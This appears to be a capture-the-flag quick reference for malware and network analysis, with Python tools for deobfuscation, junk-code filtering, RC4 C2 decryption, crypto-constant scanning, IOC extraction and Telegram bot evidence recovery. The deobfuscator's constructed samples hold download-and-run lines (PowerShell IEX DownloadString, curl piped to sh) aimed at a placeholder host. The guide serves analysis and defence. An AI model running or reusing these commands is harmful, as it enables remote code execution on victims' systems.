# CTF Malware & Network Analysis

Quick reference for malware analysis CTF challenges. Each technique has a one-liner here; see supporting files for full details with code.

## Additional Resources

- `scripts-and-obfuscation.md` - JavaScript deobfuscation, PowerShell analysis, eval/base64 decoding, junk code detection, hex payloads, Debian package analysis
- `c2-and-protocols.md` - C2 traffic patterns, custom crypto protocols, RC4 WebSocket, DNS-based C2, network indicators, PCAP analysis, AES-CBC, encryption ID, Telegram bot recovery
- `pe-and-dotnet.md` - PE analysis (peframe, pe-sieve, pestudio), .NET analysis (dnSpy, AsmResolver), LimeRAT extraction, sandbox evasion, malware config extraction, PyInstaller+PyArmor

## Obfuscated Scripts

Replace `eval` / `bash` with `echo` so the next stage is printed instead of executed; extract base64/hex blobs and identify them with `file`. See `scripts-and-obfuscation.md`.

## JavaScript & PowerShell Deobfuscation

JS: replace `eval` with `console.log`; decode `unescape()`, `atob()`, `String.fromCharCode()`. PowerShell: `-enc`/`-EncodedCommand` is base64 of UTF-16LE text, so decode with that encoding, then replace `IEX` (`Invoke-Expression`) with `Write-Output`. See `scripts-and-obfuscation.md`.

## Junk Code Detection

NOP sleds, `push`/`pop` pairs on the same register, dead writes (a register overwritten before it is read), unconditional jumps to the next instruction. Filter these out to extract the real `call` targets. See `scripts-and-obfuscation.md`.

## PCAP & Network Analysis

```bash
tshark -r file.pcap -Y "tcp.stream eq X" -T fields -e tcp.payload   # hex; tr -d ':' | xxd -r -p for raw bytes
```

Look for C2 on unusual ports. Extract IPs/domains with `strings | grep`. See `c2-and-protocols.md`.

## Custom Crypto Protocols

When a stream cipher implementation keeps one keystream state for both directions, every message in either direction advances the same keystream: concatenate ALL payloads in chronological order (client and server interleaved) before decrypting, or the second direction comes out as garbage. ChaCha20 keystream extraction: send null bytes, since 0 XOR keystream = keystream, so the ciphertext you get back is the keystream itself. See `c2-and-protocols.md`.

## C2 Traffic Patterns

Beaconing, DGA, DNS tunneling, HTTP(S) with custom headers, encoded payloads. See `c2-and-protocols.md`.

## RC4-Encrypted WebSocket C2

Remap the port with `tcprewrite` so Wireshark applies the WebSocket/TLS dissector, add the server's RSA private key for TLS decryption (this only works when the session used RSA key exchange, not (EC)DHE), then find the RC4 key in the binary. See `c2-and-protocols.md`.
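The one-liners in the Obfuscated Scripts and JavaScript & PowerShell Deobfuscation sections above, turned into a layer-peeling decoder. This is an added example written for this page, not code from `scripts-and-obfuscation.md`; the obfuscated samples are constructed at runtime from fake payloads (TEST-NET addresses) so the script runs offline.

```python
"""Peel common script-obfuscation layers: eval()/atob()/unescape()/
String.fromCharCode() wrappers, JS \\x string literals, echo|base64 -d
pipelines and PowerShell -EncodedCommand (base64 of UTF-16LE).
Added example for this page; the samples are constructed, not real malware."""
import ast
import base64
import binascii
import re
import urllib.parse

PS_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SH_B64_RE = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\|\s*base64\s+(?:-d|--decode)")
EVAL_RE = re.compile(r"^\s*eval\s*\((.*)\)\s*;?\s*$", re.S)
ATOB_RE = re.compile(r"^\s*atob\s*\(\s*(['\"])(.*?)\1\s*\)\s*;?\s*$", re.S)
UNESCAPE_RE = re.compile(r"^\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*;?\s*$", re.S)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d,\s]+)\)")
LITERAL_RE = re.compile(r"^\s*(['\"])(.*)\1\s*;?\s*$", re.S)
BARE_HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2}){8,}$")
BARE_B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def _text(raw: bytes):
    """Decode to str only if the result looks like script text, else None."""
    try:
        s = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return s if all(c.isprintable() or c in "\r\n\t" for c in s) else None


def peel(text: str):
    """Return (layer, inner) for the outermost recognised layer, or None."""
    m = PS_ENC_RE.search(text)
    if m:  # PowerShell -enc: base64 of UTF-16LE, not UTF-8
        return "powershell -enc (base64 of UTF-16LE)", base64.b64decode(m.group(1)).decode("utf-16-le")
    m = SH_B64_RE.search(text)
    if m:
        return "echo | base64 -d pipeline", base64.b64decode(m.group(1)).decode()
    m = EVAL_RE.match(text)
    if m:
        return "eval() wrapper", m.group(1)
    m = ATOB_RE.match(text)
    if m:
        return "atob() base64", base64.b64decode(m.group(2)).decode()
    m = UNESCAPE_RE.match(text)
    if m:
        return "unescape() %XX", urllib.parse.unquote(m.group(2))
    if FROMCHARCODE_RE.search(text):
        expand = lambda mm: "".join(chr(int(n)) for n in mm.group(1).split(",") if n.strip())
        return "String.fromCharCode()", FROMCHARCODE_RE.sub(expand, text)
    m = LITERAL_RE.match(text)
    if m:
        try:  # JS \x.. and \u.... escapes are close enough to Python's for literal_eval
            return "string literal", ast.literal_eval(m.group(1) + m.group(2) + m.group(1))
        except (ValueError, SyntaxError):
            return None
    blob = text.strip()
    if BARE_HEX_RE.match(blob) and (dec := _text(bytes.fromhex(blob))) is not None:
        return "bare hex", dec
    if BARE_B64_RE.match(blob):
        try:
            dec = _text(base64.b64decode(blob, validate=True))
        except binascii.Error:
            dec = None
        if dec is not None:
            return "bare base64", dec
    return None


def unwrap(text: str, max_layers: int = 16):
    """Peel until nothing is recognised; returns (final_text, [(layer, text), ...])."""
    layers = []
    while len(layers) < max_layers and (step := peel(text)):
        layers.append(step)
        text = step[1]
    return text, layers


def neutralize(script: str) -> str:
    """Swap executing sinks for printing ones so the next stage is shown, not run."""
    script = re.sub(r"\beval\s*\(", "console.log(", script)
    script = re.sub(r"\b(?:IEX|Invoke-Expression)\b", "Write-Output", script, flags=re.I)
    return re.sub(r"\|\s*(?:bash|sh)\b", "| cat", script)


# --- constructed samples (fake payloads, TEST-NET addresses) ---
INNER_JS = 'var c2 = "http://203.0.113.7:8443/gate"; fetch(c2);'
INNER_PS = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/p.ps1')"
INNER_SH = "curl -s http://203.0.113.7/x.sh | sh"
INNER_HEX = 'new ActiveXObject("WScript.Shell").Run("calc.exe")'
_fcc = "String.fromCharCode(" + ",".join(str(ord(c)) for c in INNER_JS) + ")"
SAMPLE_JS = 'eval(atob("%s"))' % base64.b64encode(_fcc.encode()).decode()
SAMPLE_PS = "powershell -nop -w hidden -enc " + base64.b64encode(INNER_PS.encode("utf-16-le")).decode()
SAMPLE_SH = "echo %s | base64 -d | bash" % base64.b64encode(INNER_SH.encode()).decode()
SAMPLE_HEX = 'eval("%s")' % "".join("\\x%02x" % ord(c) for c in INNER_HEX)

if __name__ == "__main__":
    for name, sample in [("js", SAMPLE_JS), ("ps", SAMPLE_PS), ("sh", SAMPLE_SH), ("hex", SAMPLE_HEX)]:
        final, layers = unwrap(sample)
        print(name, "->", " > ".join(layer for layer, _ in layers))
        print("   ", neutralize(final))
```

`peel()` is order-sensitive on purpose: the PowerShell and shell-pipeline checks search anywhere in the text, while the JS wrappers must match the whole expression, so a decoded stage that is itself a dropper command line is handled on the next iteration. Anything `peel()` does not recognise (a custom XOR, a packer) stops the loop and is left for manual work.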
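A pattern filter for the Junk Code Detection section above, run over a disassembly listing in text form. This is an added example written for this page, not code from `scripts-and-obfuscation.md`; the listing is constructed, and the register-overwrite check is a deliberately simple adjacent-instruction test (a real cleanup needs a disassembler such as Capstone and proper data-flow, so treat the output as a triage aid).

```python
"""Junk-code filter over an objdump/capstone-style listing.
Added example for this page; LISTING is constructed, not from a real sample."""
import re
from dataclasses import dataclass

LINE_RE = re.compile(r"^\s*(?:0x)?([0-9a-fA-F]+):\s*(\w+)\s*(.*?)\s*$")


@dataclass
class Insn:
    addr: int
    mnem: str
    ops: list


def parse(listing: str):
    """'401001: mov ebp, esp' -> Insn(0x401001, 'mov', ['ebp', 'esp']); other lines skipped."""
    insns = []
    for line in listing.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ops = [o.strip().lower() for o in m.group(3).split(",")] if m.group(3) else []
        insns.append(Insn(int(m.group(1), 16), m.group(2).lower(), ops))
    return insns


def _as_addr(op: str):
    try:
        return int(op, 16)  # accepts '0x401009' and '401009'
    except ValueError:
        return None  # register or memory operand


def find_junk(insns):
    """Map addr -> reason for every instruction that does no real work."""
    junk = {}
    for k, ins in enumerate(insns):
        nxt = insns[k + 1] if k + 1 < len(insns) else None
        if ins.mnem == "nop":
            junk[ins.addr] = "nop"
        elif ins.mnem == "jmp" and nxt and ins.ops and _as_addr(ins.ops[0]) == nxt.addr:
            junk[ins.addr] = "jmp to next instruction"
        elif ins.mnem == "push" and nxt and nxt.mnem == "pop" and ins.ops == nxt.ops:
            junk[ins.addr] = junk[nxt.addr] = "push/pop of same register"
        elif (ins.mnem == "mov" and nxt and nxt.mnem == "mov"
              and len(ins.ops) == 2 and len(nxt.ops) == 2
              and ins.ops[0] == nxt.ops[0] and ins.ops[0] not in nxt.ops[1]):
            # dest written twice in a row and the second write does not read it
            junk[ins.addr] = "dead write (overwritten by next mov)"
    return junk


def clean(insns, junk):
    return [i for i in insns if i.addr not in junk]


def real_call_targets(insns, junk):
    """Direct call targets that survive the filter, in program order."""
    return [_as_addr(i.ops[0]) for i in clean(insns, junk)
            if i.mnem == "call" and i.ops and _as_addr(i.ops[0]) is not None]


# Constructed listing: a prologue padded with junk around two real calls.
LISTING = """
401000: push ebp
401001: mov ebp, esp
401003: nop
401004: nop
401005: push eax
401006: pop eax
401007: jmp 0x401009
401009: mov ecx, 0x1234
40100e: mov ecx, 0x5678
401013: call 0x401200
401018: xor eax, eax
40101a: push esi
40101b: pop edi
40101c: call 0x401300
401021: jmp 0x401500
401026: pop ebp
401027: ret
"""

if __name__ == "__main__":
    insns = parse(LISTING)
    junk = find_junk(insns)
    for i in insns:
        tag = f"  ; JUNK: {junk[i.addr]}" if i.addr in junk else ""
        print(f"{i.addr:x}: {i.mnem} {', '.join(i.ops)}{tag}")
    print("real call targets:", [hex(t) for t in real_call_targets(insns, junk)])
```

Note what the filter deliberately leaves alone: `push esi; pop edi` moves a value between registers, and `jmp 0x401500` skips ahead, so both survive; only the six instructions that provably do nothing are dropped.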
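A worked version of the two stream-cipher rules above (Custom Crypto Protocols: one shared keystream state for both directions; the null-byte keystream probe) and of the RC4-Encrypted WebSocket C2 case. This is an added example written for this page, not code from `c2-and-protocols.md`. RC4 stands in for whatever stream cipher the sample uses (the same reasoning applies to ChaCha20 under a fixed key and nonce); the session, key and "implant" oracle are constructed, and the assumption that the implant re-keys with the same static key on every connection is what makes the keystream probe transferable to the captured session.

```python
"""Shared-state stream cipher C2 decryption. Added example for this page;
the key, messages and implant behaviour are constructed."""


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class RC4:
    """Minimal RC4 (KSA + PRGA) kept as one object so state carries across calls."""

    def __init__(self, key: bytes):
        S = list(range(256))
        j = 0
        for i in range(256):
            j = (j + S[i] + key[i % len(key)]) & 0xFF
            S[i], S[j] = S[j], S[i]
        self.S, self.i, self.j = S, 0, 0

    def keystream(self, n: int) -> bytes:
        out = bytearray()
        for _ in range(n):
            self.i = (self.i + 1) & 0xFF
            self.j = (self.j + self.S[self.i]) & 0xFF
            self.S[self.i], self.S[self.j] = self.S[self.j], self.S[self.i]
            out.append(self.S[(self.S[self.i] + self.S[self.j]) & 0xFF])
        return bytes(out)

    def crypt(self, data: bytes) -> bytes:
        return xor(data, self.keystream(len(data)))


KEY = b"s3cr3t-c2-key"  # constructed; in a real case it comes out of the binary

# Constructed session in wire order. Both endpoints keep ONE cipher object for
# both directions, so every message, whoever sent it, advances the same keystream.
MESSAGES = [
    ("C2S", b"HELLO id=DESKTOP-7F3A user=alice"),
    ("S2C", b"CMD whoami"),
    ("C2S", b"OUT desktop-7f3a\\alice"),
    ("S2C", b"CMD download http://203.0.113.7/stage2.bin"),
]


def simulate_session(messages, key):
    """Produce the capture as (direction, ciphertext); one RC4 models both peers in lockstep."""
    shared = RC4(key)
    return [(d, shared.crypt(p)) for d, p in messages]


def decrypt_per_direction(capture, key):
    """The intuitive but WRONG approach: a fresh cipher per direction."""
    ciphers = {}
    return [(d, ciphers.setdefault(d, RC4(key)).crypt(c)) for d, c in capture]


def decrypt_chronological(capture, key):
    """Correct approach: every payload, both directions, through one cipher in capture order."""
    rc4 = RC4(key)
    return [(d, rc4.crypt(c)) for d, c in capture]


def new_session_encrypt(plaintext: bytes, key: bytes = KEY) -> bytes:
    """Stand-in for a live implant that re-initialises the cipher with the same key per connection."""
    return RC4(key).crypt(plaintext)


def keystream_from_null_probe(encrypt_oracle, n: int) -> bytes:
    """Send n null bytes: 0 XOR ks = ks, so the reply IS the first n keystream bytes."""
    return xor(encrypt_oracle(bytes(n)), bytes(n))


def decrypt_with_keystream(capture, keystream: bytes):
    """Key-less decryption using only a recovered keystream prefix; stops when it runs out."""
    out, pos = [], 0
    for d, c in capture:
        chunk = keystream[pos:pos + len(c)]
        if not chunk:
            break
        out.append((d, xor(c, chunk)))  # truncated if the prefix ends mid-message
        pos += len(c)
    return out


if __name__ == "__main__":
    cap = simulate_session(MESSAGES, KEY)
    print("per-direction :", decrypt_per_direction(cap, KEY)[1][1])   # garbage
    print("chronological :", decrypt_chronological(cap, KEY)[1][1])   # b'CMD whoami'
    ks = keystream_from_null_probe(new_session_encrypt, 48)
    print("from probe    :", decrypt_with_keystream(cap, ks))
```

The per-direction decrypt gets the very first message right and everything after it wrong, which is the tell for a shared-state implementation in a CTF capture. The null-byte probe only yields keystream for the byte positions you probed, so it recovers a prefix of the captured session; to decrypt all of it, probe at least as many bytes as the capture contains.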
## Identifying Encryption Algorithms

AES: S-box begins `63 7c 77 7b` (`0x637c777b`); ChaCha20 (and Salsa20): the constant `expand 32-byte k`; TEA/XTEA: delta `0x9E3779B9` (or its negation `0x61C88647` when the loop subtracts); RC4: sequential S-box init, `S[i] = i` for `i` in 0..255, followed by the key-scheduling swap loop. See `c2-and-protocols.md`.

## AES-CBC in Malware

Common pattern: key = MD5 (AES-128) or SHA256 (AES-256) of a hardcoded string; IV = first 16 bytes of the blob, ciphertext follows. Sanity check before decrypting: blob length minus 16 must be a multiple of 16. See `c2-and-protocols.md`.

## PE Analysis

```bash
peframe malware.exe   # Quick triage
pe-sieve              # Runtime analysis
pestudio              # Static analysis (Windows)
```

See `pe-and-dotnet.md`.
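A byte-signature scanner for the Identifying Encryption Algorithms section above. This is an added example written for this page, not code from `c2-and-protocols.md`; it goes slightly beyond the page's list by also looking for MD5/SHA-1, SHA-256 and CRC32 constants, since the key-derivation step of the AES-CBC pattern usually shows up as an embedded hash implementation. The sample blob is constructed.

```python
"""Crypto-constant scanner for quick algorithm identification.
Added example for this page; SAMPLE_BLOB is constructed."""
import struct
import sys

SIGNATURES = {
    "AES S-box": [bytes.fromhex("637c777bf26b6fc5")],
    "AES inverse S-box": [bytes.fromhex("52096ad53036a538")],
    "ChaCha20/Salsa20 constant": [b"expand 32-byte k", b"expand 16-byte k"],
    # delta and its negation (used when the round subtracts), both byte orders
    "TEA/XTEA delta": [struct.pack("<I", 0x9E3779B9), struct.pack(">I", 0x9E3779B9),
                       struct.pack("<I", 0x61C88647), struct.pack(">I", 0x61C88647)],
    # RC4 builds S[i]=i at runtime, so this only fires on memory dumps or a
    # precomputed table; in a static binary look for the KSA swap loop instead
    "RC4 identity S-box": [bytes(range(256))],
    "MD5/SHA-1 IV word": [struct.pack("<I", 0x67452301), struct.pack(">I", 0x67452301)],
    "SHA-256 K[0..1]": [struct.pack("<II", 0x428A2F98, 0x71374491),
                        struct.pack(">II", 0x428A2F98, 0x71374491)],
    "CRC32 table[1..2]": [struct.pack("<II", 0x77073096, 0xEE0E612C),
                          struct.pack(">II", 0x77073096, 0xEE0E612C)],
}


def scan(blob: bytes):
    """Return sorted [(offset, name)] for every signature occurrence."""
    hits = []
    for name, patterns in SIGNATURES.items():
        for pat in patterns:
            start = 0
            while (idx := blob.find(pat, start)) != -1:
                hits.append((idx, name))
                start = idx + 1
    return sorted(hits)


def scan_file(path: str):
    with open(path, "rb") as f:
        return scan(f.read())


# Constructed blob: AES S-box prefix, ChaCha20 constant, TEA delta, RC4 table
SAMPLE_BLOB = (b"\x00" * 32 + bytes.fromhex("637c777bf26b6fc5") + b"\xaa" * 7
               + b"expand 32-byte k" + struct.pack("<I", 0x9E3779B9) + bytes(range(256)))

if __name__ == "__main__":
    hits = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan(SAMPLE_BLOB)
    for off, name in hits:
        print(f"0x{off:08x}  {name}")
```

The 4-byte signatures (TEA delta, MD5/SHA-1 IV word) will false-positive in large binaries; confirm a hit by opening the offset in the disassembler and checking that it is loaded into a round loop. The 8- and 16-byte signatures are reliable on their own.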
## .NET Malware Analysis

Use dnSpy/ILSpy for decompilation; AsmResolver for programmatic analysis. LimeRAT C2: AES-256-ECB with an MD5-derived key. See `pe-and-dotnet.md`.

## Malware Configuration Extraction

Check the `.data` section, PE/.NET resources, registry keys, and encrypted config files. See `pe-and-dotnet.md`.

## Sandbox Evasion Checks

VM detection, debugger detection, timing checks, environment checks, analysis tool detection. See `pe-and-dotnet.md`.

## PyInstaller + PyArmor Unpacking

`pyinstxtractor.py` to extract the bundled `.pyc` files, PyArmor-Unpacker for PyArmor-protected code. See `pe-and-dotnet.md`.

## Telegram Bot Evidence Recovery

Use the bot token from the malware source to call the `getUpdates` and `getFile` Bot API methods. See `c2-and-protocols.md`.

## Debian Package Analysis

```bash
ar -x package.deb && tar -xf control.tar.xz   # control archive may also be .gz or .zst
# Check postinst scripts (and preinst/prerm/postrm)
```
See `scripts-and-obfuscation.md`.

## Network Indicators Quick Reference

```bash
# escape the dots: an unescaped "." also matches "1x2x3x4" and version strings
strings malware | grep -E '([0-9]{1,3}\.){3}[0-9]{1,3}'
strings -el malware | grep -iE 'https?://|\.(com|net|org|ru|cn)\b'   # UTF-16LE strings in Windows binaries
tshark -r capture.pcap -Y "dns.qry.name" -T fields -e dns.qry.name | sort -u
```
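The Network Indicators Quick Reference above as a script: validated IPv4 addresses (no unescaped-dot or out-of-range octet false positives), URLs, hostnames, and the UTF-16LE strings that plain `strings` misses, with defanging for the write-up. This is an added example written for this page, not code from `c2-and-protocols.md`; the sample blob is constructed with TEST-NET and reserved example domains.

```python
"""Network-indicator extraction from a binary or blob.
Added example for this page; SAMPLE_BLOB is constructed."""
import ipaddress
import re

IPV4_RE = re.compile(
    rb"(?<![\w.])(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)(?![\w.])")
URL_RE = re.compile(rb"\b(?:https?|wss?|ftps?)://[^\s\x00'\"<>]+", re.I)
DOMAIN_RE = re.compile(rb"\b(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,24}\b", re.I)
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")  # printable UTF-16LE runs
# "domains" that are really file names; extend as you meet new ones
FILE_EXTS = {"dll", "exe", "sys", "dat", "txt", "pdb", "ini", "log", "xml", "json",
             "bin", "tmp", "py", "pyc", "ps1", "bat", "cmd", "vbs", "js"}
# RFC 1918 plus loopback/link-local; ipaddress.is_private would also hide TEST-NET
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8")]


def wide_strings(blob: bytes):
    """UTF-16LE strings (how Windows binaries store most config) as ASCII bytes."""
    return [m.group(0).decode("utf-16-le").encode("ascii") for m in WIDE_RE.finditer(blob)]


def is_local(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def extract_iocs(blob: bytes):
    haystack = blob + b"\x00" + b"\x00".join(wide_strings(blob))
    ips = {m.group(0).decode() for m in IPV4_RE.finditer(haystack)}
    urls = {m.group(0).decode() for m in URL_RE.finditer(haystack)}
    domains = set()
    for m in DOMAIN_RE.finditer(haystack):
        name = m.group(0).decode().lower()
        if name.rsplit(".", 1)[1] not in FILE_EXTS:
            domains.add(name)
    return {
        "ips": sorted(ips),
        "public_ips": sorted(ip for ip in ips if not is_local(ip)),
        "domains": sorted(domains),
        "urls": sorted(urls),
    }


def defang(ioc: str) -> str:
    """hxxp://203[.]0[.]113[.]7 form for reports, so nobody clicks it."""
    return ioc.replace("http", "hxxp").replace(".", "[.]")


# Constructed blob: real-looking strings mixed with the usual false positives
SAMPLE_BLOB = (b"MZ\x90\x00" + b"\x00" * 12
               + b"http://203.0.113.7:8443/gate\x00"
               + b"kernel32.dll\x00WinHttpOpen\x00"
               + b"version 1.2.3\x00"
               + b"evil-updates.example.net\x00"
               + b"ws://c2.example.org/ws\x00"
               + b"10.0.0.5\x00999.1.1.1\x00"
               + "c2-backup.example.com".encode("utf-16-le") + b"\x00\x00")

if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_BLOB).items():
        print(kind, [defang(v) for v in values])
```

`999.1.1.1`, `1.2.3` and `kernel32.dll` are dropped, `10.0.0.5` is kept but separated from the routable C2 address, and the wide-string fallback domain only surfaces because of the UTF-16LE pass. Still review the hostname list by hand: the TLD regex cannot tell `WScript.Shell` from a domain unless its extension is in `FILE_EXTS`.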
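For the Telegram Bot Evidence Recovery section above: the `getUpdates` / `getFile` flow with the parsing split out so it can be exercised offline. This is an added example written for this page, not code from `c2-and-protocols.md`; the token and the `getUpdates` response below are constructed (the shape follows the Bot API), and the live calls only use the standard library.

```python
"""Telegram Bot API evidence pull using a token recovered from the malware.
Added example for this page; SAMPLE_TOKEN and SAMPLE_UPDATES are fake."""
import json
import urllib.parse
import urllib.request

API = "https://api.telegram.org"


def method_url(token: str, method: str) -> str:
    return f"{API}/bot{token}/{method}"


def file_url(token: str, file_path: str) -> str:
    # file_path comes from getFile; the download link is documented as valid for about an hour
    return f"{API}/file/bot{token}/{file_path}"


def call(token: str, method: str, **params):
    """Live API call (not exercised offline). Do NOT pass offset to getUpdates on
    the first read: an offset confirms every older update and they stop being returned."""
    data = urllib.parse.urlencode(params).encode() if params else None
    with urllib.request.urlopen(method_url(token, method), data=data, timeout=30) as resp:
        return json.load(resp)


def summarize_updates(resp: dict):
    """Flatten a getUpdates response into operator chats, commands and attached file_ids."""
    rows = []
    for upd in resp.get("result", []):
        msg = upd.get("message") or upd.get("channel_post") or upd.get("edited_message") or {}
        chat, sender, doc = msg.get("chat", {}), msg.get("from", {}), msg.get("document") or {}
        rows.append({
            "update_id": upd.get("update_id"),
            "chat_id": chat.get("id"),
            "chat": chat.get("title") or chat.get("username") or chat.get("first_name"),
            "sender": sender.get("username") or sender.get("id"),
            "date": msg.get("date"),
            "text": msg.get("text"),
            "file_id": doc.get("file_id"),
            "file_name": doc.get("file_name"),
        })
    return rows


def operator_chat_ids(resp: dict):
    return sorted({r["chat_id"] for r in summarize_updates(resp) if r["chat_id"] is not None})


def fetch_file(token: str, file_id: str, dest: str) -> str:
    """getFile -> file_path -> download (live; the Bot API caps getFile at 20 MB)."""
    info = call(token, "getFile", file_id=file_id)
    path = info["result"]["file_path"]
    urllib.request.urlretrieve(file_url(token, path), dest)
    return path


# Constructed getUpdates response; ids, names and token are fake
SAMPLE_TOKEN = "123456789:AAFakeTokenForDemoOnly"
SAMPLE_UPDATES = {"ok": True, "result": [
    {"update_id": 700001, "message": {"message_id": 10, "date": 1700000000,
        "chat": {"id": -1001234567890, "title": "loot", "type": "supergroup"},
        "from": {"id": 4242, "username": "operator"}, "text": "/screenshot"}},
    {"update_id": 700002, "message": {"message_id": 11, "date": 1700000060,
        "chat": {"id": -1001234567890, "title": "loot", "type": "supergroup"},
        "from": {"id": 4242, "username": "operator"},
        "document": {"file_id": "BQACAgFAKEfileid0001", "file_name": "stage2.bin"}}},
]}

if __name__ == "__main__":
    for row in summarize_updates(SAMPLE_UPDATES):
        print(row)
    print("operator chats:", operator_chat_ids(SAMPLE_UPDATES))
    # live: print(call(SAMPLE_TOKEN, "getMe")); fetch_file(SAMPLE_TOKEN, "<file_id>", "evidence.bin")
```

Two limits to keep in mind: `getUpdates` returns only incoming updates (what the operator sent to the bot), not the bot's own `sendDocument`/`sendMessage` output, and Telegram keeps unconfirmed updates for at most 24 hours, so old exfil traffic is not recoverable this way. `getUpdates` also fails while a webhook is set for the bot; `getWebhookInfo` tells you whether that is the case.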